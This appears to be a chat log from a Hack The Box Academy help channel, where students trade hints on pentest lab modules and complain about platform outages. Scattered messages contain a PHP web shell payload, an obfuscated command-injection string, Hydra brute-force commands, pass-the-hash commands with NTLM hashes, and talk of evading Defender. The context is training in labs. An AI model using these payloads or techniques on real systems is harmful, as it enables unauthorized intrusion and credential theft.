#modules

Thank you 👍

--max-retries affects port probes too, sometimes a port can be open but closed later during a scan

But if I check how much probe the nmap sent to the target through --packet-trace it only SENT 2 times and concluded the response if the host discovery is disabled or only SENT 8 times and concluded the response if the HOST discovery is enabled. That's the part I am confused about, I mean why it did not sent 10 probes as mentioned in the --max-retries when it does not received any response?

What is the other question you are having a difficult time with as well?

Is HTB academy down?

500 | Server is not feeling well

it only affects port scans, not host discovery

same

okay but i tried with port scan too by disabling host discovery. like it did not tried on sending 10 probes before concluding the result when it does not received any response from the target but just by sending 8 probes then it just concluded that the response as filtered even though it mentioned to sent 10 probes in --max-retries in default.

okay but that doesn't affect things? if you feel that the number is insufficient, increase it. you'd rarely have to mess with this value

same

okay understood👍, I am just trying this to understand like why it did not worked in --max-retries. Thank you.

I have the same problem... does it happen to everyone?

yah, there is clearly something wrong with the service, I can't open the htb-academy module page normally.

anyone can help?

can you link the section, ill see if i have access to it.

anyone getting 500 errors at login? just starting up for the day

repeated 500s after login, browser reset, cookies restet etc.

password cracking module password hunting in windows section

is the academy server down, was working on it earlier today but getting the following error: 500 | Server is not feeling well

The nibble academy machine has been instable as well

after login just get that 500 error

Yes, I confirm the behaviour; After logout cannot login anymore; The error message is 500 Server is not feeling well

think i will wait an hour or to then try again

damn, was about to answer the last question of a module :/

yes, the same for me

500
Server is not feeling well

guys i have issues with this one any help?

password cracking module password hunting in windows section

i was about to ask if the login areas are bugged but i think yall already answer my question.

default password are often stored in configuration files.

yeah but i receive so mny output its just time wasting by looking one by one i'm missing something

you can DM me if you get stuck.

if i want to add the subdomain to my etc/hosts/ .should i write like this?

Its at the top after kali. I think the bottom is reserved for ipv6

ussually it works for academy.htb

but i donot know how to add the subdomain

well if it works then its fine

the format looks fine too

https://www.howtogeek.com/27350/beginner-geek-how-to-edit-your-hosts-file/

Hi, do ya know if certs only can land you a job in Europe ? I'm still trying to know 🤔

depends on a lot of things, but deffintly can help

so if you can, do it

Maybe see if there are other services running that will accept those creds.

Hi everybody
I got stuck in the Exploiting SSTI - Twig Example from Server-Side Attacks. I have the RCE and when i do 'ls' i don't see any flags,
am i looking for it in the wrong place ?

I'm facing this issue again and again

While solving:
Host Based Enumeration
Topic: Oracle TNS

did you install it correctly?

No

Any hint would be appreciated 🙂

link me, i think i have a nudge for you.

anyone else?

i need help with nmap IPS evasion Hard, i tried ``` *]$ sudo nmap 10.129.77.45 -p 50000 -sSU --source-port 53 -sV --disable-arp-ping -Pn

also -sA, -sT, T1 send delay 50s , decoys -D RND:5 but nothing. keep getting ibm-db2 or tcpwrapped, nc yields nothing

and filtered. am i looking at the correct service?

i need help with the medium nmap ips lab, cant manage to find the dns version. already try every solution i find on the htb forum

just refresh the page and try again. Maybe switch regions. It happens once in a while. labs have been working for me.

You're in the right direction, the solution is covered in the material. Throw all the weird tricks you learned at that port

oh wait, did you just edit that?

deleted some stuff yeah i think i was tripping

Ok, yeah, you're //really// in the right direction but maybe throw things at the problem one at a time though.

Definitely note the differences when you're specifying a source-port vs not specifying that source port. Think of any other utilities that might garner you information from the service.

okay, thank you

yepp

Determine what user the ProFTPd server is running under. Submit the user name as the answer.

I'm a bit stuck on assessment II for nosql.. anyone available for a small nudge?

Use cURL from your Pwnbox (not the target machine) to obtain the source code of the “https://inlanefreight.com” website and filter all unique paths of that domain. Submit the number of these paths as the answer.

i think i find the solution but htb is not accepting it 😭 can someone confirm this is the answer i'm looking for ? thanks !

sure DM me

If it's not accepting make sure you have no white space before and after. It could also be the wrong flag

It was the wrong flag ahah, but thanks for the tip 👍

Is HTB Academy having issues atm? I can't terminate my machine for whatever reason. The button for it is gone.

Currently on SQL Injection Fundamentals

Did you refresh the page?

Yeah I did

This has been happening for me off and on for the past 2 days actually.

I usually have to wait for the timer to run out but even when I start up a new target I can't always connect to it.

Anyoner know how to deal with the "there are no active instances left" im in the middle of a module end assesment and had to reset, now im caught in this... tried clearing browser data and logging out and back in, changing pwnbox location...

anything else?

I got the same issue

ok good to know

same here

there was 5XX errors this morning, that seems to have been solved but we still seem to be having issues and we're not seeing anything in the announcements yet -_-

@burnt steeple @old oasis any luck yet? none here

i guess im gonna call it quits for a while... -_-

nah

kk thx, imma fuck off for a bit then

"There are no available instances. Please try again later."

so the issue with the instances not available is not happening only for me right?

There is an issue with pwn box

Mee too

Guys, can you connect to VM?

Yes, you can use VPN to access the Modul Labs with your VM

https://academy.hackthebox.com/vpn

Got it

I experience that myself. HTB is working on it?

Hi guys, I'm doing the Skill Assessment of the Pivoting module.
I'm having a hard time in enumerating the network once I'm logged on the INLANEFREIGHT machine. Can someone tell me whether I'm on the right path in trying to scan the whole 255.255.0.0 subnet? Because I've tried 255.255.255.0 and it didn't lead to anything

I’m having the same issue right now

Yes, you're on the right track.

but what do you mean by scan? If it's taking ages you might find a better way to identify other systems in that network.

why are you trying to scan the subnet mask?

i'm pretty sure that's not a network in the lab

I believe he's referring to the subnet.

like, /16 or /24 but as a netmask

I need to know about the possibility of transferring any remaining credits from my HTB platform account to the Academy platform. I am interested in using these credits to purchase boxes for modules within the Academy

If this is a Windows lab be aware that most do not respond to ping you'll need to scan via tcp like -sV or similar.

Yea, might be my miscomprehension here 🙂 i'm currently convinced that subnet and netmask are the same thing, but I suppose I'm being wrong ?

oh, thus I'll have to tunnel onto it

No, you're right.
255.255.255.0 = /24
255.255.0.0 = /16

However, as calculatedOre suggests, I hope you're not scanning 255.255.255.0!

You've got it right, it's just that most windows machines don't respond to icmp scans .. (pings) so you'll need to utilize other scanning methods...

I was 🥲 atleast, that feels to me what the assessment demands

😬

Live and learn :-)

When you do a bunch of Linux boxes and find yourself on a Windows target you may get used to them responding then chase your tail for a bit... Ask me how I know ;P

why i cannot open the link?

practice 😄

You've connected to academy VPN on your VM right? That's a different connection than boxes.

yeah there is a difference between academy VPN and labs VPN

If you're certain you're connecting to academy try to redownload a fresh connection file and failing that... Are you doing a Windows machine? It won't respond to ping and may not have a web server running on port 80. Scan it

I did the same mistake earlier

Hi, I am doing the last tasks in Getting Started Module. I am logged as an Admin in the web but I can´t upload any files.

i do in my vm

Have you pinged the target? Looks like a WordPress site, go thru the instructions make sure it being served on an uncommon port and verify you're getting that response from ping

Oh snap, check for http title and add to hosts of course ... You can get that from 'nmap -vv...'

Sometimes instructions tell you what hostname to use in hosts file as well

Likely a vhost being used which will require an addition to your host file

So how are you doing on this, have you found the next host? If not you can DM me. I've got a few minutes to check out what you're trying and give you a hot/cold clue.

try using msfconsole instead

i already did a nmap but it gived me nothing

I would advise you to learn nmap more than rely on autorecon every time. At least to start. What I do is issue a series of progressively time-intensive scans and you should probably work out your own procedures:

• Two scans: default TCP scan and a default UDP scan... this gets everything like 95% of the time
• Standard scan but with -sV or maybe some other scripty stuff, banner grab, whatev
• Then do the weird sans like ACK scans or whatever
• Finally start full TCP / UDP scans and let them run in the background but move on to inspecting all the stuff you'll have almost instantly found with the first scans.

somebody online who has done the digital forensic modul?

That's kind of what I was suggesting. I mean, chaining them together -- especially the slower stuff. And, yeah, I have to explore autorecon myself but if youre on the nmap modules might as well get used to using nmap because that nitty-gritty knowledge comes in handy more than just throwing a comprehensive tool at the problem.

Hi all,
I am trying to answer 'Try to exploit the upload form to read the flag found at the root directory "/".' on the File Upload Attack skills assessment.
I've managed to find upload folder directory and confirmed I can see a test image file from it. I am a bit stuck on uploading a file. I have intercepted the upload page and have used intruder to find some extensions I could use to bypass and upload. I am now just stuck on trying to submit it.
Is anyone able to help nudge me?
Apologies if it's really simple, have been at this for a little while.

Any thoughts? On the mssql section of footprinting. Have tried it on kali as well as the pwnbox

try it without python3 before mssqlclient.py (I only looked at last command)

Heard. Thank you

have you found the URL where the uploaded files are stored in the server?

Yes I have found that. I've uploaded a normal jpeg image and confirmed I can open that by going to the upload directory

in the module you have learned methods to upload 'special files' which allow you to gain foothold in the system. maybe try upload one of those.

Thank you I will have a read through again! Been looking at for a little while so sure I have just missed something simple.

I always wonder when I see pictures like this. You want to learn how to hack, but you don't know how to take screenshots.

Have discord on my phone. Didn't add it to my computer

any simple way to transfer files from host to pwnbox? Working on evasion module - dynamic analysis. Switching betweeen the DEV and TARGET machines is time consuming and a pain, so I figured making them locally would be easier

smbclient and copy them over

impacket-smbserver -smb2support share /tmp/smb/shared
copy .\cookies.sqlite \192.168.45.179\share\cookies.sqlite

• 0 Try adding any of the injection operators after the ip in IP field. What did the error message say (in English)?

But

please match the requested format. is saying invalid

Hello everyone ! For the Injection Attacks module,(Web pentest) Skill assessment. I got all the xml in the invoice but i`m stuck in getting the data from the arrays.

Hi

Can one help me

just say ur problem, what is it

i am crazy or?

anyone know how to fix an issue where mssqlclient.py logins and runs normally until you try to use and the commands give no response back? I tried googling it but no one else seems to be having this issue

You can DM me

i think i faced smth similar in the past, i was using an older version, when i updated it worked

Code error 600?

make sure ur using the latest version, it MIGHT work

Hello,

Anyone got an hint to get the last flag of the SA of the introduction to sliver module?

Got DC02 pwned but can't really figure how to move on from here

ill test it out agian, i copied and pasted from the github

where?

What did u even ask?

yea, i just pipx installed instead of using the git repo script and now it works. thanks for the help

please refrain from spoiling module content.

mannnnnnn lol

Why not switch to root first?

in cases such as the exercises of file upload attacks where there is no need to connect to vm, what options are there if the connection is way way too slow?

None i guess right?

nvm, Getting Started is Tier 0. should be ok

still no... i must be doing something wrong with vim id_rsa file.. stumped...lol

you still didnt switch to root

you can't edit that file due to permissions

you have root's private key

look for something else you can use

I'm currently on the "attacking FTP" module in week 6 "attacking common services" and I cannot find the FTP port. Is there a command I need to use that I'm not using? Every time I run an nmap scan the scan shows no open ftp ports. Is there something I'm missing?

Has anyone else had trouble in Windows Evasion - Dynamic Analysis - using the shellcode from the tool provided? I can't get a callback in the shell after AES encrypting it for some reason, no error, the cmd prompt runs after launching the NotMalware.exe and there is no callback on the listener. The following (Option #3) C# program works fine, and the shellcode in the previous module worked fine. I also tried without it being AES-encrypted and it also did not work for me like that. Any thoughts on what is going wrong?

have to keep restarting that machine

So the VM is fucked? great lol

You may need to try another one of the options shown in the module 😉

oh wait you said you did try them, so you got the flag then?

i don't think anything is 'wrong' there's only 1 method that works in that section

Yes

Try passing the IP and port directly in the code to that custom C# code in the Dynamic analysis section

You should get a shell

The automation script won’t know what’s your network specs to call back

anyone else having trouble finding the FTP port in Week 6 "attacking FTP"?

Right I tried them all, only the c# one works as a test from the dev machine; I did not get the flag since I can’t trigger that one myself due to the .exe restrictions on the target machine in C:\ drive

Dm and I can give you a direction

tried every way...lol user2...as well as root as well as .ssh... lmao... it'll come lol

google how to ssh with a private key

It said permission denied. You need to elevate your privileges because the user context that you're running the command under doesn't have the permissions required to write to the root directory.

the module also goes over the process of using root's private key

you skipped the first part

Anyone here who can give me a slight nudge for NoSQL skill assessment 2 ?

The issue persists both using the Pwnbox and local machine + VPN

https://academy.hackthebox.com/module/77/section/852

Are you connected to the VPN at the same time as having the pwnbox spawned?

No, it seems the machine is not responding

did you try reload it?

sometimes it happens

I refreshed the page, and Terminated the spawn

and the Spawn a new machine, with a new IP
But it keeps somehow not responding to some requests

via vpn or pwnbox?

Currently, only using my local machine + VPN

try both, Idk why, but it really happens sometimes and you should try pwnbox

Just a curiosity, but what exactly is a Service Principal Name (SPN)? It's not an Active Directory object I don't think. It is an attribute of a user, or an attribute of a service running on a computer?

here's what to do: terminate the target. terminate the pwnbox if it's on. disconnect from the VPN. re-download a fresh new vpn file. connect to the vpn. hard refresh the page where you spawn the target with CTRL+SHIFT+R, wait 5 mins after it spawns and try again. that should clear up any issues.

Googling just gets me some variation on it's being a "uniquie ID that ties a service to the user account running that service"

Ok. I found something that sort of explains it. Best I can tell they're like "aliases" to an user object that reference a binary (the service part) and apply to a computer object... so they're not exactly objects or attributes. Microsoft is so weird.

SPN's are unique identifiers for a service instance in a network that uses kerberos authentication. it's a string that identifies a service instance. they help identify which server or service the client is trying to connect to and ensure proper authentication.

Thanks, right, the thing tripping me up is that AD is comprised of objects with attributes, but an SPN is neither an object nor an attribute while being related to both in some way. Thinking of them as alias's helps tie it together in my mind.

it's a string identifier

https://www.rfc-editor.org/rfc/rfc1964.txt

Sure. String identifier is just like... a type of data as I see it. Like a GUID or an integer ID. So I can understand that in the context of a field in a kerberos token, but everything else in AD in an object. Like, are there other string identifiers that aren't SPN's? Probably, but they're probably properties of an object where SPN's are not objects.

Anyway, it's neither here nor there. I'm just trying to I guess refine my understanding and terminology.

spn's are stored as attributes of certain objects, aka the servicePrincipalName attribute

so yes they are attributes

i guess more technically it's a value of an attribute

Hey guys i'm stuck at password cracking module hunting on linux section

with the hint they said that they found a user kira with a certain password but when i use tools to enum users on the machine i can't find a kira i just find a sam

ahhhhh not installing key.pub on target... smh

Just took a look and i suppose the thing was to brute force creds with hyrda using the usernames on htb resources and the rockyou txt file? If anyone can help me with telling how you normaly find the kira user ^^

i found different users like ||will:123456, john123456, dennis:123456|| and a bunch of others with the same pwd but i can do nothing with it

and if you do it with te rockyou list it tkaes dayssss

Hey everyone,

I’m encountering issues with Login Forms on Login Brute Forcing module and I think I’ve set everything up correctly. Here’s the Hydra command I used:

||hydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt -f 83.136.254.47 -s 41425 http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'" -t 60||

This is the output I got:
[DATA] max 60 tasks per 1 server, overall 60 tasks, 3400 login tries (l:17/p:200), ~57 tries per task
[DATA] attacking http-post-form://83.136.254.47:41425/login.php:username=^USER^&password=^PASS^:F=<form name='login'
1 of 1 target completed, 0 valid password found

Despite running the attack, no valid passwords were found. Can anyone provide some guidance or hints on what might be wrong? Any help is appreciated!

It finally is working; Terminated, spawn again, but now selected VPN from a different region with TCP

can i get a sanity check plz on "Advanced Command Obfuscation" exercise - https://academy.hackthebox.com/module/109/section/1039?

the payload is || ip=127.0.0.1%0a%09{ta"i"l,-n,1}<<<$(g"re"p%09mysql)<<<$(g"re"p%09r"oo"t)<<<%09$(f"in"d%09${PATH:0:1}u"s"r${PATH:0:1}s"ha"re${PATH:0:1})|| and the output is ||/usr/share/glib-2.0/schemas|| but it's not liking that answer

is there something wrong with this command:

evil-winrm -i 10.129.78.245 -u INLANEFREIGHT\lab_adm -H A96ED648BE6FFFB03F3E086F25282F2D

you're passing a \ which resolves to literal char 'l'. use \\ if you want to escape a \

Can u please show me

correct command so i can understand

do you have one or two \ in the username

bc discord is escaping them too, so to get \\ i have to use 4

username is lab_adm from the AD enum and attack module

right but you have the domain. do you have one or two \ between them

if 1, try 2. if 2, try dropping the domain

Take domain name out

it just doesnt work no matter what ... Did anyone try to pass the hash on this module using evil winrm ?

or use / instead of \

what module

Is the user able to winrm?

might be the wrong user, i seem to recall thinking lab_adm user was for internal use not for student use

but link the module, maybe it'll jog my memory

1. I have checked through CME exploiting SMB to test hash if it auths and it did to many hosts

2. then I checked which of those hosts there is winrm port open

3. still not work ...

Yeah that was usually the case,I don’t remember using lab_adm ever

Probably forgot tho

Is this the correct order of operations for me to do ?

Also it is kind of tedius to have to cross check IPs to find this stuff .. any better method ?

bro link the module so i have a clue what you're asking about... or i guess wait for someone else to help

https://academy.hackthebox.com/module/143/section/1265

Sorry guys I made a mistake, the hosts that have win-rm dont match the hosts that have smb which the hash worked on...

Maybe I just didnt find the right user yet

But I did find hosts that are vuln to eternal blue so Im gonna try that ...

that link just went to the initial enumeration page i don't think that's the right link

Sorry I am not following the module, I am just trying to try things to learn

Def not the answer

aight yeah good luck, hard to help if i dunno what exercise you're working on / trying to replicate

bump^^ 😉

The answer starts with /usr/share/mysql/ not /usr/share/glib-2.0/

hrm i suppose it should include mysql since it's being grep'd huh

thx figured i was missing something dumb... now to figure out why it ignores the greps

that command is so long 😭

i feel sooo close but cant save key to remote target???

reread the SSH Keys part in the privilege escalation section of the module again

they explain everything you need to do

bout to... i am obviously overlooking something.... gonna go back further

You know how when you install something on Windows you get a confirmation dialog box that asks yes/no to run the program (User Account Control)? Same idea with Linux, you need to elevate your privileges to write to the root folder. You can't do it with a regular user account that doesn't have permissions there.

yeah seems <<< can only be used once and you have to pass it a string hence the subshell ... good to know at least

yeah, thats why i usually just go with the base64 method

I get to root but still permission denied

with root you should be able to write to the folder

or chmod it

how many min required to crack the hash on Password Attacks Passwd, Shadow & Opasswd? (ive tried 15m with rockyou.txt but i did get the password)

the password attacks module can take a bit longer, but nothing should be more than like 30 mins or so

most of the modules that have cracking in them take a few minutes except that password attack one. not sure about cracking with hashcat as i didn't do that module.

oohhhh i haven't actually been root... hmmm

i told you 😛

WOW!!! I was trying to do WAYYYYYY too much!!! smh...LMAO!!! Gott itt

Never had to write anything...just follow directions...right after chmod...lol... hours and hours... still fun tho lol

Can anyone nudge me on the Server-Side Attacks - Skills Assessment? Some people have talked about being given login creds off the bat, but I am not seeing any of those. I am also not seeing the ||static/jquery.js|| that others have talked about. Has this lab been changed?

it was recently updated yeah

what is the god damn answer: What is one prominent issue with passwords?
Broken Authentication
Brute-Forcing Passwords

Nobody is going to give you the answer. It’s also a tier2 module. The answer should be in the content.

Yes, thanks, it only took me one control + f check and looking for the question within the module text. I'm just rambling. Sorry, it's very late and I'm tired.

Take some time to do something relaxing and go to bed 🙂 the brain needs some time to wind down

hi guys how should i organize notes or make notes on what etc note tips?

I’m personally a fan of Obsidian

But there’s many out there

Try some out and stick with the one that feels most comfortable to you

i c thx do u have any advice o nhow to orgnaize it tho

like just make a new file for each module for each page and just note down most important bits

?

how do we enable copy and paste into our pwnbox?

specifically from my system to the HTB vm

thats what I did for the most part, but everyone takes notes differently, just start noting stuff down and you'll figure your style out

I create a folder for each module and page for sections. Separate page for cheatsheet

That should work via the browser normally. Or at least, does for me

I use chrome on Mac

where do I find that setting?

I didn’t need to change any setting. Only thing I experience is that if I have pwnbox in a separate window, I need to copy after refreshing for a proper resize

Does Firefox just not paste then?

I can’t answer that, haven’t used Firefox for HTB yet

There's an icon in the lower right you need to click on, that opens a window you can paste into from your machine, it's the clipboard for the pwnbox too so if you copy something in the pwnbox it's there in the clipboard.

If you don't see it turn off adblocker

I guess I will never see it then

why? is your adblocker bad and can't disable it for a single domain?

not like there are ads on htb

JK obviously, I appreciate the info

Module: File Upload Attack
Section: Blacklist Filters:
Are we suppose to escape the sanitization in the upload?
intruder (URL encoding OFF) and discovered the whitelisted extensions.
And uploaded the payload via proxy and modifying content to <?php system($_GET["cmd"]); ?>
But even with it shown as uploaded successful, when I browse to that page under /profile_images/ with the required parameters, it will not shown the content at all

More than that, when i inspected page source, I found out that my payload content was commented out

Oh never mind
I see why now

Need to do more enum next time

I don't really get the digital forensics module. Now, the skill assessment is with Velociraptor, but the module only gave a brief introduction to the tool.

strangest module ever done at htb

but i want end it and rate it, muhaha

⭐

i mean how bad is a module, when you reach the skill assesment and dont even know where to start.

Skills Assessment - Easy
Abusing HTTP Misconfigurations

Can someone help me with this?

Good Day I need help in Vulnerability Assessment Nessus Skills Assessment

Problem: HTB gave information of the target 172.16.16.100, and credentials for authenticaition. However, upon doing ping on 172.16.16.100 there was no response. So I did a basic network scan on the spawned pwnbox. The pwnbox has a different credential from the given target 172.16.16.100 so I add both credentials for windows authentication. The scan went well and it has infos, and detected vulnerabilities. However, upon searching for SMB there were no results, so I assume that the authentication was a failure. If someone can enlighten me what I did wrong, it would be a huge help. TY!

It seems like a session puzzling auth bypass issue but can't exploit it!
There is also a reflected XSS on the products page but there isn't any caching mechanism in place to exploit that.

you need to access nessus on the spawned target, not pwnbox, read the requirements part

Apologies, I may have created confusion, to sum things up.

From the Requirements section:
Target: 172.16.16.100
creds: administrator:Academy_VA_adm1!

From the Spawn Target:
Target: <Some IP when spawned>
creds: htb-student:HTB_@cademy_student!
Because it says here... "Authenticate to <spawned target IP> (ACADEMY-VA-SCAN01) with user "htb-student" and password "HTB_@cademy_student!""

Used kali linux WSL2
I did put the IP from requirements, and spawn target. But nessus only scanned the spawn target. Additionally, there was no port 445,139 detected in the service, I also double checked this using nmap.

Nessus can be accessed at https:// < IP >:8834. The Nessus credentials are: htb-student:HTB_@cademy_student!. You may also use these credentials to SSH into the target VM to configure Nessus.
Once logged in, perform a BASIC NETWORK SCAN (modify the scan template to scan ALL ports, leave all other options the same) against the target: 172.16.16.100. Additionally, set up the scan to be authenticated using administrator:Academy_VA_adm1! as the credentials.

don't use pwnbox to scan

can anybody say me how to start the skill assesment in digital forensic. totaly lost

i mean am on right track here? or i am total wrong? i have no idea?
these are the artifacts\collections right? now the first question is about VAD.
i have collected the windwos.system.vad for the first question, do i have to do this for every artifcat?

how should i analyze them? download as csv and than?

i just want to end the damn module and rate with 1 star

hi

any mod online who can help?

what's up?

this

And why do you need a mod for this?

why not?

mods can't necessarily help with that

use what you've learned to complete the assessment

thats the point. don't really get the digital forensics module. Now, the skill assessment is with Velociraptor, but the module only gave a brief introduction to the tool.

for this module it does drop you right in, but it's easy to figure out once you realize what you need to do

just have a closer look at the Velociraptor section and it should be clear

that what i tried here. right track?

or do i have to buy the annual subsrciption for a step by step guide

i don't have my notes atm so i can't tell you

Yes, ||Windows.System.VAD || is correct

ok, thanks. but i am a bit confused, there are a lot of flowd ids, those are collections? now do i have to "hunt" the vad for every flow id?

How did you solve it in the module a few sections earlier? The method is exactly the same, only the data is different

hey guys, has anyone had troubles with the second question in module "Analyzing Evil With Sysmon & Event Logs"? (https://academy.hackthebox.com/module/216/section/2301)

I injected the PS.dll and it is shown in Process Hacker, updated and utilised sysmon custom config.xml, but I can't find clrjit.dll and spoolsv.exe together.

Hey guys can someone help me with this? its password crackingm module linux haunting section?

I found a zip on the target with a password on it i tried to bruteforce it and found a pwd but it doesnt work

just want to know if im on the right path

This module is all about cracking passwords. So yes, you're on the right track.

Thank you for this, and for your patience. I now understood the instruction, and the main problem was accessing the https://<spawn_target_ip>:8834 saying that site can't be reached, both Firefox, and Chrome. I did however successfully connected to HTB VPN, even replaced it, pinged, and nmap <spawn target ip> -p8834 which results to an open port. I accessed the machine's nessus through pwnbox and it worked. But I am still left clueless why the machine isn't accessible through my browser

how to avoid false positifs on cracking zipfiles then? you have an idea?

And here we are again at the point where I need a crystal ball. Without knowing exactly what you've done, it's impossible to see how you can prevent false positives.

Follow the module. It shows you exactly how you can crack what and what you need to pay attention to.

you weren't really supposed to crack any zipfiles. Just utilize the methods that were taught in that section

you'll need to connect to vpn to access the target outside of pwnbox, because the ip isn't publicly accessible

https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn

VPN was successful, there is a tun0 appearing, and the same tun0 IP from the pwnbox.

don't use vpn and pwnbox at the same time

can someone help me with the linux basics module, to get the answer to this question? Which kernel version is installed on the system? (Format: 1.22.3)

Do you remember the command which they taught you to get the OS and Kernel details about a host?

no

read the section again

okay

it's there

thank you

I see now that the problem lies within my WSL2 environment. While I can access the targets from previous lessons, accessing https://<spawn_target>:8834 is another issue. I downloaded an openvpn software for windows and used the openvpn file from HTB and is accessible. Thank you for sharing your solution, sir

I am stuck at Footprinting / smtp / + 1 Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.
I know I can do brute forcing to get the username but is there a manual way that i can use?

did you do a google search for smtp user enumeration or anything at all?

ah I missed the wsl part, so you've connected to the vpn in wsl, but cannot connect to the target in your windows browser, correct?

yes, while wsl2 kali was successfully connected. Accessing the link from the browser was unsuccessful

my bad since you already know about the brute-force part it won't help you.

wsl is pretty much a sperate system, so anything you do inside will stay in there

I'd recommend using a standalone visual machine since there's no gui in wsl

Due to potato spec, I had to devise a simple and light-efficient way to use kali. I did use parrot OS and is lighter than kali, but I might need to wait to buy for upgrades.

ah I see, if that's the case then probably using pwnbox would be better

Does anyone know where to find a section about modifying lazagne/mimikatz so I can be use when defender is running? I've can't find it anoymore.

that is always evolving, things that work a couple months ago will get detected

I have a project that does it but you'll need to modify it a bit

the windows evasion module goes over obfuscating the rubeus source code to avoid detection, probably could apply to lazagne and mimikatz too. but i haven't seen a module about lazagne/mimikatz specifically. (i haven't done all the modules either)

laz and mimi are exe so it's not as simple as just encrypting and injecting into a remove process but the idea of evasion is similar

Yes that's where I've seen if I recall right, it similar to changing shellcode but maybe I'm mixing it up.

it teaches using threatcheck to find where defender detects it then modifying the source code

its in the open source software section

yes thats the one thanks

whats the equivelant for linux root on windows?

nt authority\system

thanks

Hi

yes i did, all I found was about brute forcing

so is there a way to do it without brute forcing?

How do I speak in general?

read and follow the steps in #welcome

Thanks super nuts

someone to DM about many AD stuff?

its better to just post the questin imo

has the pwnbox issue been sorted? i see we're still getting a warning at login.

its been a bit laggy though working fine.

im having tough time with password attacks-

thx, mien just spawned didnt want to jinx it

too much questions and not clearly sorted in my brain

they hydra module?

make a list, post the lst.

good questions beget good answers

the attacking active directory section

hey guys im trying to crack a shadow file i did those commands

guys you guys know how much of academy should i do to make sense in uying labs

ah windows, my favorite.

you done this password attacks module? i might need help with this one.

not that particular one -_-

lol. everybody hates this one.

I have a question about Attacking Enterprise Network - in the section 'Exploitation & Privilege Escalation' walkthrough, some credentials were mentioned. my question is, is it possible to obtain said credentials even without the walkthrough? I tried to use some metasploit module but It didn't work.

*I've tried to be as vague as possible in the details to avoid spoilers, however I can DM the questions with more details to get better answer.

currently doing it and can confirm it gets frustrating

Hello I've just started learning, and am looking for a mentor

not the right place to look for a mentor

Damn any advice then

idk im doing everything right but still its getting struck here : ┌──(hx0r㉿kali)-[~/Downloads]
└─$ impacket-psexec Administrator@10.129.204.23 -hashes :30B3783CE2ABF1AF70F77D0660CF3453

Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[] Requesting shares on 10.129.204.23.....
[] Found writable share ADMIN$
[*] Uploading file ejzYzEBK.exe

check out the guys doing live recon on youtube, some of them mentor... for $$ tho

prob really worth it tho... for the right one

can you share your full terminal output? it looks clipped?

hey guys I am probably a beginner is secrity I did networking, windows and linux fundamentals from htb academy. Should I start preparing for the CPTS exam?

Thats it ..After that its not going anywhere

ok so its in the middle of the upload? how big is the exe its uploading?

Same thing with crackmapexec ..Im not able to execute any commands after -x flag

re-run the cmd and tap the space bar button after a few minutes, to try and kick the terminal over?

Thanks

Is there a problem with htb ?

I get a 502 on the site

oh gosh, it must be back.... 5xx errors for a bit yesterday followed by pwnbox failures once you finally logged in...

log out, clear browser cache, etc.

ok thanks !

in the SOC Path -> Windows Attack/Def

https://academy.hackthebox.com/module/176/section/1791

we run a cmd like this...

.\Rubeus.exe asktgt /user:DC2$

i've never seen users/hosts referred to with this $ char... like we do with a hidden share \\dc2\c$ ... is this noteworthy for some reason?

chat gpt says that its a "hidden machien account" is this a good answer?

all computer accounts' sAMAccountName ends with a $, $ after a share name means it's hidden

ie: its a known host would /user:DC2 also work?

it's just to differentiate between user and machine accounts

OH

ty

hey...so ummm

im not able to message in the general chat?

Read and follow #welcome

Pivoting, Tunneling, and Port Forwarding
SSH for Windows: plink.exe

I don't understand what to do in the module, I connected with rdp but there is no program called Proxifier

Attempt to use Plink from a Windows-based attack host. Set up a proxy connection and RDP to the Windows target (172.16.5.19) with "victor:pass@123" on the internal network. When finished, submit "I tried Plink" as the answer.

Hello can anyone help me for Attacking Common Applications:osTicket
i try to use credentials which in the instruction but it give error, do i need to register with dehashed which in lab and then search usernames or what?

zap hud isnt working 👀

anyone has an idea?

Yoooooooo

yall hackrs

Wrong Channel 😉
Please read and follow #welcome

Ok

i had probs with zap too, this was a month ago or so... nobody uses zap in real world you might trudge thru the zap modules if you feel ABSOLUTELY inclined, but it prob better to use burp unless you're just over invested in the module.

Answer my question

yes, you mean dump lsa?

not exactly. I dont wanna give here too much details, can I DM you with the question with more details?

I only see 2 creds being used in that section, you're talking about the config file?

it's found previously during the info gathering phase

Ty.

deleted the message because spoilers

thanks 🙂

I am having some issues with Sharphound, that the older versions are just not working and the latest version is having issues with Bloodhound(Stuck on 0%), Is there any reliable way to to fix this, which version of sharphound i should use?

2.0.0

ok thanks

also the bloodhound gui you're using is probably outdated, the later versions are using docker

is there any installation guide i can follow?

https://github.com/SpecterOps/BloodHound

this version will work with the latest sharphound

i should just change my bloodhound version rather than doing the collection again, feels like the best approach

by latest u mean 2.5.7 right?

whatever version is available in the repo

hey guys, I'm really stuck at the last question of the c2 sliver SA.
I crafted both diamonds and golden tickets but nothing seem to work.
any hints?

After uploading a svg, the response shouldnt return the file we want given that the file was uploaded successfully? Or do we need to find where it uploaded to access it?

Nvm it was in the second response the answer not the first

Is there anyone who can help me with this assembly code module?
This is the question, "Edit the attached assembly code to loop the "loop" label 5 times. What is the hex value of "rax" by the end? " And here is what I currently have the code set to.
global _start
section .text
_start:
mov rax, 2
mov rcx, 5
loop:
imul rax, rax ; multiply rax by itself
loop loop ; decrease rcx and repeat the loop

; After the loop ends, the value of rax will be 2^5, that is 32.
; The hex value of rax is 20.
This corrected code will loop the "loop" tag 5 times and at the end the value of rax will be 2^5 which is 32. The hex value of rax is 0x20. but it says the answer is wrong .

yeah if memory is serving me correctly locating files uploaded is covered later on in the module

it's not 2^5

better to just run the program and step through it

Can anyone help with the Login Brute Force Module on Basic HTTP authentication I keep getting Errors Child with PID terminating.

posting the actual command and error would be helpful

hydra -l basic-auth-user -P 2023-200_most_used_passwords.txt 94.237.50.176 http-get / -s 81

DATA] max 16 tasks per 1 server, overall 16 tasks, 200 login tries (l:1/p:200), ~13 tries per task
[DATA] attacking http-get://94.237.50.176:81/
[ERROR] Child with pid 21892 terminating, can not connect
[ERROR] Child with pid 21895 terminating, can not connect
[ERROR] Child with pid 21896 terminating, can not connect
[ERROR] Child with pid 21894 terminating, can not connect
[ERROR] all children were disabled due too many connection errors
0 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-10-06 08:58:17

can not connect
make sure you're using the right ip and port

https://academy.hackthebox.com/module/17/section/64
